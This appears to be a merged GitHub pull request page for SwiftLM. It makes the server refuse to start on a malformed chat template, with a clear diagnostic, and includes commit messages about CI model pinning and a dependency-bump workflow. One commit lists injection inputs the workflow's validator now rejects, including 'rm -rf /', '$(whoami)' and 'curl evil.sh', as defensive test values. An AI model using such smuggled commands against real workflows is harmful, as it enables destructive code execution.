Skip to content

fix: name a malformed chat template instead of failing every request - #142

Merged
solderzzc merged 5 commits into
mainfrom
fix/diagnose-malformed-chat-templates
Aug 14, 2026
Merged

fix: name a malformed chat template instead of failing every request#142
solderzzc merged 5 commits into
mainfrom
fix/diagnose-malformed-chat-templates

Conversation

@solderzzc

Copy link
Copy Markdown
Member

Follow-up to #141. That PR stopped a broken upstream template from breaking our CI; this one stops it from being hard to diagnose for anyone else.

The gap

When a checkpoint ships a chat template the Jinja parser rejects, SwiftLM loaded cleanly, reported ready, opened the port — and then returned HTTP 500 on every request:

parser('Unexpected token type: closeExpression')

That names neither the chat template, nor the model, nor the fact that the offending file came from someone else's checkpoint. It reads as "SwiftLM is broken".

Working out that the real cause was {- bos_token -}} — one brace short, in LiquidAI's republished LFM2.5-VL-450M-MLX-4bit — took CI logs plus a bisect across two model revisions, with the ability to patch a template locally to confirm. A user reporting this has none of that.

Before / after

$ SwiftLM --model <broken checkpoint> --vision
[SwiftLM] ✅ Ready. Listening on http://127.0.0.1:15480
# ...then HTTP 500 on every request, forever, across restarts
$ SwiftLM --model <broken checkpoint> --vision
[SwiftLM] ❌ The chat template shipped with <model> is not valid Jinja and could not be
parsed: parser("Unexpected token type: closeExpression"). This is a defect in the model's
chat_template.jinja (or the chat_template field of its tokenizer_config.json), not in the
request — report it to whoever publishes the checkpoint. Pinning to an earlier revision of
the model is the usual workaround.
$ echo $?
1

What changed

  • Template failures surface as MalformedChatTemplate, naming the model, pointing at the file, attributing the defect, and giving the workaround.
  • The template is rendered once during load, before the port opens. A checkpoint that cannot produce a prompt refuses to start instead of serving 500s indefinitely.

A model with no chat template stays legitimate — base models ship without one and /v1/completions doesn't need it — so only a template that exists and fails to parse is fatal. The startup probe is shaped like the simplest real request (one user turn, add_generation_prompt) rather than a bare minimum, so a failure is the template's and not the probe's.

Verification

The false-positive risk is the whole risk here — a startup gate that wrongly rejects a good model is worse than the bug. Every cached model I have, spanning both modalities, thinking and non-thinking, and two families:

model result
LFM2.5-VL-450M (good revision) starts
Qwen2-VL-2B (VLM) starts
Qwen2.5-0.5B (LLM) starts
Qwen3-1.7B (thinking) starts
LFM2-VL-1.6B (other LFM) starts
LFM2.5-VL-450M (broken revision) exits 1, diagnostic, port never opens

Contract suite: 10 passed, 0 failed, 2 skipped.

Why it generalises

HuggingFace repos are mutable and this will happen again. The failure shape — loads fine, starts fine, fails every request — is the expensive one to diagnose from a bug report, and it costs one template render at startup to convert it into an obvious one.

🤖 Generated with Claude Code

solderzzc and others added 5 commits August 11, 2026 21:30
Points at bfc2462, which brings two things:

- SharpAI/mlx-swift-lm#48 — glm_moe_dsa / deepseek_v3_2 load and run with
  dense attention (stage 1 of #111). GLM-5.2 is DeepSeek V3.2, whose indexer
  is inert below index_topk (2048), so output is exact for the first 2048
  positions of context and diverges beyond them. That is enough to exercise
  --stream-experts against the 308GB checkpoint, which is what the issue
  actually asks for.
- SharpAI/mlx-swift-lm#47 — the all-KV-shared assistant regression tests,
  which had not been picked up by a bump yet.

#48 also generalises a latent trap in DeepseekV3.sanitize, which dropped
`model.layers.61` by string literal. That number is just numHiddenLayers; on
GLM-5.2's 78 layers it would have deleted a real layer while keeping the MTP
block.

Verified past the registry: pointing the binary at a glm_moe_dsa config
constructs the model and fails only on absent weights —

    Key model.embed_tokens.weight not found in
    DeepseekV32Model.DeepseekV3ModelInner.Embedding

so the architecture is reachable end to end, not merely registered. No real
weights have been run: the smallest glm_moe_dsa checkpoint is 308GB.

Refs #111

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Dependency Automation has failed all 12 times it has run since 2026-04-27 —
it has never once succeeded. Every failure is the same:

    ##[error]Input 'token' not supplied. Unable to continue.

The Create Pull Request step reads secrets.SWIFTLM_PR_TOKEN, which is not set
in this repository. The dispatch side is fine: mlx-swift-lm's auto_release
does hold a token that can dispatch cross-repo, so the event arrives and the
job runs, does its work, and dies at the last step.

Rather than add the secret, stop trying to open the PR. A workflow needs a
personal access token to open one usefully because GitHub does not start
workflow runs for events raised by GITHUB_TOKEN — a bot-opened PR would arrive
with no checks at all, permanently pending rather than green, and release.yml
gates releases on CI concluding successfully. A pushed branch plus a compare
link in the job summary costs one click and gets real CI, because the PR event
is then the human's.

Keeping a human in that loop is not a consolation prize. Bumps here have
needed a pointer check, an umbrella build and a smoke test before they were
trustworthy; this does the mechanical part and leaves the judgement.

Three further problems fixed while in here:

- The mlx-swift branch ran `swift package update mlx-swift`, which does
  nothing: both dependencies are `.package(path: "./…")` local paths backed by
  submodules, and SwiftPM takes whatever is on disk for a path dependency. It
  could only ever have produced an empty commit. Both are now handled the same
  way, as the pointer move they are.

- client_payload was interpolated straight into run blocks, so a crafted
  new_tag would have been executed rather than compared. Values are now
  validated (source_repo against an allowlist, new_tag against a plain-tag
  pattern) and passed through the environment. Verified rejecting
  `b554; rm -rf /`, `$(whoami)`, `b554 && curl evil.sh`, `../../../etc/passwd`,
  `-x` and empty, while accepting b554, b459 and v1.2.3.

- A re-dispatch for a tag already checked out produced an empty commit; that
  case now reports and stops.

Exercised against the real submodule: an already-current tag (b500) takes the
no-op path, a nonexistent tag (b99999) fails with a clear message, and a real
older tag (b497) computes bfc2462 → b320bc4.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
Main went red at 19:28 today with nothing changed on our side — the merge that
preceded it touched only a workflow file. The failing job was
integration_matrix (vision), and it reproduced on re-run, so it was not a flake.

LiquidAI republished LFM2.5-VL-450M-MLX-4bit at 19:23, five minutes earlier.
The new revision's chat template is one brace short of valid:

    old:  {{- bos_token -}}
    new:  {- bos_token -}}

Every request against it returns HTTP 500,
`parser('Unexpected token type: closeExpression')`. Confirmed by reproducing
locally against the new revision, then restoring that single brace in a copy —
same weights, same request, HTTP 200 with identical token counts. The fault is
upstream, not a compatibility gap on our side, and no code change here would be
the right response to a malformed template.

CI never noticed the substitution because the vision job did not prefetch this
model at all: the server fetched it mid-test and resolved the floating id to
whatever was newest. So the job's result depended on what a third party
published that afternoon.

Pins the revision, prefetches it, and teaches ci-download-models.sh a
`repo@revision` spec so any model can be pinned the same way. The test resolves
the pinned snapshot on disk and falls back to the floating id with a printed
note, so a local run without a prefetch still works but cannot quietly test a
different revision than CI did.

The test-vision.sh edit rotates the job's model cache key, so CI re-downloads
rather than restoring a cache that now holds the broken revision.

Verified: the vision test passes locally with the pin, both cases; the
`repo@revision` split parses correctly for pinned and unpinned specs; the
fallback path triggers and warns when the pinned snapshot is absent.

Worth reporting upstream — LiquidAI's template is broken for every consumer,
not just this repository.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
The first version of the revision-pinning change assembled the optional
`--revision` flag into an array and expanded it unconditionally. The runners are
macOS, which ships bash 3.2, where expanding an *empty* array under `set -u` is
an unbound-variable error rather than expanding to nothing. Every unpinned
download therefore failed, which took out every job that prefetches a model —
speculative-decoding, dflash, ssd-draft-memory-guard — while the pinned path
would have worked fine.

Spelled the two calls out instead. Verified by running the script under
/bin/bash 3.2 with `set -u` for both shapes: unpinned resolves to the current
snapshot, `repo@revision` resolves to the pinned one.

CI caught this, which is the system working; worth noting the local `bash -n`
syntax check could not have, since the failure is a runtime expansion.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
When a checkpoint ships a chat template the Jinja parser rejects, SwiftLM used
to load cleanly, report ready, open the port, and then return HTTP 500 on every
request with

    parser('Unexpected token type: closeExpression')

That message names neither the chat template, nor the model, nor the fact that
the offending file came out of someone else's checkpoint. It reads as a broken
server. Diagnosing the real instance of this — LiquidAI republishing
LFM2.5-VL-450M-MLX-4bit with `{- bos_token -}}`, one brace short — took CI logs
and a bisect across two model revisions, and that was with far more to work
with than a user reporting it would have.

Two changes:

- Template failures now surface as MalformedChatTemplate, which names the model,
  points at chat_template.jinja / tokenizer_config.json, says the defect belongs
  to whoever publishes the checkpoint, and mentions pinning as the workaround.

- The template is rendered once during load, before the port opens. A checkpoint
  that cannot produce a prompt now refuses to start rather than serving 500s
  indefinitely across restarts.

A model with no chat template at all stays legitimate — base models ship without
one and /v1/completions does not need it — so only a template that exists and
fails to parse is treated as fatal. The startup probe is shaped like the
simplest real request (one user turn, add_generation_prompt) rather than a bare
minimum, so a failure is the template's rather than the probe's.

Verified: the broken revision now exits 1 with the diagnostic and never opens the
port. Five cached models covering both modalities, thinking and non-thinking, and
two model families all still start normally — LFM2.5-VL-450M (good revision),
Qwen2-VL-2B, Qwen2.5-0.5B, Qwen3-1.7B, LFM2-VL-1.6B. Contract suite: 10 passed,
0 failed, 2 skipped.

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
@solderzzc
solderzzc merged commit b8fb28c into main Aug 14, 2026
13 checks passed
@solderzzc
solderzzc deleted the fix/diagnose-malformed-chat-templates branch August 14, 2026 01:50
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant